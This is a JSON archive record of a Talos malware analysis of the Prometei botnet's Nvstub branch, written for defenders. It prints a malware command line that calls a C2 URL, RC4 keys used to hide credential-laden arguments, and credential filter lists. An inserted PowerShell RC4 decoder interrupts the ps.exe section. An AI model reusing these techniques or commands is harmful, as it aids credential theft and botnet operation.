C:\\windows\\dell\\SearchIndexer.exe\r\nC:\\Windows\\dell\\nvstub.exe 211.23.16[.]239/prometheus.php_x1\r\nInstallation and launch of the Nvstub branch as seen from the command-line log.\r\nNvstub.exe is a simple module that sets up the environment for the other modules, the most significant being the second bot, nvsync.exe. 
The _agent.7z archive contains the nvsync2.exe and nvsync4.exe variants of the bot. Nvstub.exe first checks the version of the .NET framework installed on the system, attempts to terminate three modules of this branch (nvsync.exe, ps.exe and socks.exe) and, finally, copies the appropriate version of nvsync to nvsync.exe and launches it with the arguments forwarded from its own command line.\r\nNvstub is the first module, setting up the environment for the other modules.\r\nNvsync\r\nWhile most of the other botnet modules are written in C or C++, here the actor shifts programming environment and chooses the .NET framework and C# for the main bot module of the Nvstub branch. The actor applies obfuscation to the module using the CryptoObfuscator protector, but that is easily addressed using de4dot.\r\nPart of the deobfuscated nvsync.exe code, with functions renamed to describe their functionality.\r\nWhen started, the nvsync.exe module parses its command-line arguments and either initializes the bot and connects to the C2, or creates an array of processes, the number of which depends on the computing power of the infected system. Each process launches another instance of nvsync.exe which, based on its parameters, checks the validity of credentials for a list of IP addresses supplied by the C2 server using either the SMB or the RDP client.\r\nWe observed only one C2 URL for the Nvstub branch: https://211.23.16[.]239/prometheus.php, hosted in Taiwan.\r\nThe parameters for child processes are first encrypted with RC4 and then encoded using Base64. 
The RC4 passphrase \"param error user\", used for encrypting the parameters of child processes, is itself decrypted from the hardcoded Base64-encoded string \"T9FLs3QS45JuVnTAljDz4Q==\" using the initial passphrase \"Data param error\".\r\nThis encryption is likely used to hide the otherwise suspicious-looking invocations of the child processes, whose arguments contain IP addresses, domain names, usernames and passwords.\r\nRC4 decryption of a password parameter using a CyberChef instance.\r\nApart from the main nvsync.exe module, there are two additional modules that are integral to the correct functioning of the botnet: ps.exe and socks.exe. They are both 32-bit applications.\r\nBefore calling either of the credential-validation modules, nvsync.exe filters credentials to avoid certain targets. These include:\r\n…\r\nIME_ADMIN\r\nIME_USER\r\nPlesk Administrator\r\nSvcCOPSSH\r\nWDeployAdmin\r\nGuest\r\nГость\r\nftpuser\r\nFTP User\r\nAltro utente\r\nOther User\r\nДругой пользователь\r\nThe validation will also not be attempted if the supplied credentials contain one of the following strings:\r\nworkgroup\r\nmshome\r\nwin\r\nmicrosoft\r\nuser\r\nadmin\r\nadministrator\r\npc\r\ncom\r\nbuh\r\nlocal\r\nhome\r\ncorp\r\noffice\r\nlan\r\nbiz\r\nnet\r\norg\r\nloc\r\nru\r\nua\r\ntr\r\nserver\r\nserv\r\nsrv\r\nPs.exe\r\nThe first module attempts to log onto TCP port 445 using the NTLM authentication protocol. 
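The chain the post describes has two RC4 steps: the hard-coded blob is decrypted with the initial passphrase to recover the parameter passphrase, and that passphrase then encrypts each child's arguments before Base64 encoding. As an added example, not code from the post or from the samples, the PowerShell below implements RC4 and walks that chain: it recovers the parameter passphrase from the blob quoted above and then round-trips a constructed child argument through the same RC4-then-Base64 wrapping. It assumes, as CyberChef's RC4 recipe does, that the key is the raw ASCII bytes of the passphrase; the constructed argument uses a documentation-range address, not one from the campaign.

```powershell
# Added example: RC4 as used for nvsync.exe child-process parameters (Base64 over RC4).
# Key = ASCII bytes of the passphrase (assumption, matching CyberChef's RC4 passphrase input).

function Invoke-RC4 {
    param([Parameter(Mandatory)] [byte[]] $Key, [Parameter(Mandatory)] [byte[]] $Data)
    # Key-scheduling algorithm
    $S = New-Object int[] 256
    for ($i = 0; $i -lt 256; $i++) { $S[$i] = $i }
    $j = 0
    for ($i = 0; $i -lt 256; $i++) {
        $j = ($j + $S[$i] + $Key[$i % $Key.Length]) -band 0xFF
        $t = $S[$i]; $S[$i] = $S[$j]; $S[$j] = $t
    }
    # Pseudo-random generation, XORed over the data; encryption and decryption are the same operation
    $out = New-Object byte[] $Data.Length
    $i = 0; $j = 0
    for ($n = 0; $n -lt $Data.Length; $n++) {
        $i = ($i + 1) -band 0xFF
        $j = ($j + $S[$i]) -band 0xFF
        $t = $S[$i]; $S[$i] = $S[$j]; $S[$j] = $t
        $out[$n] = $Data[$n] -bxor $S[($S[$i] + $S[$j]) -band 0xFF]
    }
    return ,$out
}

function Unprotect-NvsyncParameter {
    # Base64 -> RC4 with the passphrase -> text
    param([Parameter(Mandatory)] [string] $Base64, [Parameter(Mandatory)] [string] $Passphrase)
    $key   = [Text.Encoding]::ASCII.GetBytes($Passphrase)
    $plain = Invoke-RC4 -Key $key -Data ([Convert]::FromBase64String($Base64))
    return [Text.Encoding]::ASCII.GetString($plain)
}

function Protect-NvsyncParameter {
    # The forward wrapping, so a constructed argument can be round-tripped
    param([Parameter(Mandatory)] [string] $Text, [Parameter(Mandatory)] [string] $Passphrase)
    $key    = [Text.Encoding]::ASCII.GetBytes($Passphrase)
    $cipher = Invoke-RC4 -Key $key -Data ([Text.Encoding]::ASCII.GetBytes($Text))
    return [Convert]::ToBase64String($cipher)
}

# Step 1: recover the parameter passphrase from the hard-coded blob and initial passphrase quoted in the post
$paramPassphrase = Unprotect-NvsyncParameter -Base64 'T9FLs3QS45JuVnTAljDz4Q==' -Passphrase 'Data param error'

# Step 2: wrap a constructed child argument the way nvsync.exe would, then unwrap it again
$argument = '192.0.2.10:3389'
$wrapped  = Protect-NvsyncParameter -Text $argument -Passphrase $paramPassphrase
if ((Unprotect-NvsyncParameter -Base64 $wrapped -Passphrase $paramPassphrase) -ne $argument) {
    throw 'RC4 round trip failed'
}
$paramPassphrase
```

The post reports the recovered passphrase as \"param error user\"; if step 1 prints something else, the key-derivation assumption (raw passphrase bytes, no hashing) does not hold for the sample in hand, and the round trip in step 2 still succeeds because it only depends on both sides using the same bytes. The same Unprotect-NvsyncParameter call, given the Base64 argument of a captured nvsync.exe child process and the recovered passphrase, yields the target address and credentials in the clear.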
Every successful connection confirms the validity of the credentials for the target IP address, and the credentials are confirmed with the C2 server by the nvsync.exe module.\r\nPacket capture showing attempts to connect and validate supplied credentials.\r\nThere are some similarities in the code of ps.exe and rdpcIip.exe, mostly around low-level SMB communication and authentication with the NTLM Security Support Provider.\r\nSocks.exe\r\nSocks.exe's RDP communication capabilities depend on the open-source and free RDP client libraries freerdp2.dll and freerdp-client2.dll. The application first processes its parameters, which include the IP address and port of the host, as well as the base name, without the extension, of the file containing credentials to be attempted for logging into the target system. The supplied file name is generated by base64-encoding the RC4-encrypted ip_address:port combination of the target.\r\nSocks.exe parses a file with the extension \".cpass\" containing candidate passwords and attempts to log into an RDP server using the combination of the domain supplied as a command-line argument and the administrator's username. Each successful combination of credentials is saved in a file with the same base name and the extension .cpass_good.\r\nOnce socks.exe terminates and returns to nvsync.exe, nvsync reads all validated credentials and submits them to the command and control server.\r\nAuxiliary modules for the Nvstub branch\r\nThe second branch's auxiliary modules are all legitimate executables or libraries that support the operation of the branch. 7z.exe is the 7-Zip unarchiver used to extract files from the _agent.7z archive that contains all modules of the Nvstub branch. Zlib.dll is a 7z.exe dependency. 
Two of the FreeRDP DLLs — freerdp2.dll and freerdp-client2.dll — are required for successful RDP communications but can also be found as a part of a legitimate\r\nFreeRDP installation.\r\nConclusion\r\nDespite their activities being visible in logs, some botnets successfully fly under detection teams' radar, possibly\r\ndue to their small size or constant development on the adversary's part. Prometei is just one of these types of\r\nnetworks that focuses on Monero mining. It has been successful in keeping its computing power constant over the\r\nthree months we've been tracking it.\r\nThe botnet was active as early as the beginning of March, but it seems to have been dealt a blow by a takeover of\r\none of its C2 servers on June 8. But this takeover didn't stop its mining capabilities or the validation of stolen\r\ncredentials. The botnet continues to make a moderate profit for a single developer, most likely based in Eastern\r\nEurope.\r\nThe actor behind it is also likely its developer. The TTPs indicate we may be dealing with a professional\r\ndeveloper, based on their ability to integrate SMB exploits such as Eternal Blue and authentication code and the\r\nuse of existing open-source projects, such as Mimikatz and FreeRDP.\r\nApart from stealing computing power, the botnet's behaviour of stealing and validating credentials is worrying.\r\nAlthough we only saw evidence of stolen credentials being used to spread laterally, they also have a value on\r\nunderground markets, and the damage potential of losing an important administrative username and password is very\r\nhigh. 
This is why organizations that detect the presence of the Prometei botnet on their systems should act immediately\r\nto remove it and to make sure none of their credentials are leaked to the command and control server.\r\nCoverage\r\nWays our customers can detect and block this threat are listed below.\r\nAdvanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these\r\nthreat actors. Exploit Prevention present within AMP is designed to protect customers from unknown attacks such\r\nas this automatically.\r\nCisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious\r\nwebsites and detects malware used in these attacks.\r\nEmail Security can block malicious emails sent by threat actors as part of their campaign.\r\nNetwork Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention\r\nSystem (NGIPS), Cisco ISR, and Meraki MX can detect malicious activity associated with this threat.\r\nAMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.\r\nUmbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs,\r\nwhether users are on or off the corporate network.\r\nOpen Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org.\r\nIOCs\r\nOSQuery\r\nCisco AMP users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected\r\nwith this specific threat. 
For specific OSqueries on this threat, click below:\r\nPrometei botnet registry entry\r\nURLs\r\nSHA256s\r\nSvchost.exe 
sha256s\r\nMsdtc sha256s\r\nSorted\r\nOther\r\nSource: https://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html"
	],
	"report_names": [
		"prometei-botnet-and-its-quest-for-monero.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434046,
	"ts_updated_at": 1775791218,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e2dd49c43c470375806d61d3a60efabcbc58f97e.pdf",
		"text": "https://archive.orkl.eu/e2dd49c43c470375806d61d3a60efabcbc58f97e.txt",
		"img": "https://archive.orkl.eu/e2dd49c43c470375806d61d3a60efabcbc58f97e.jpg"
	}
}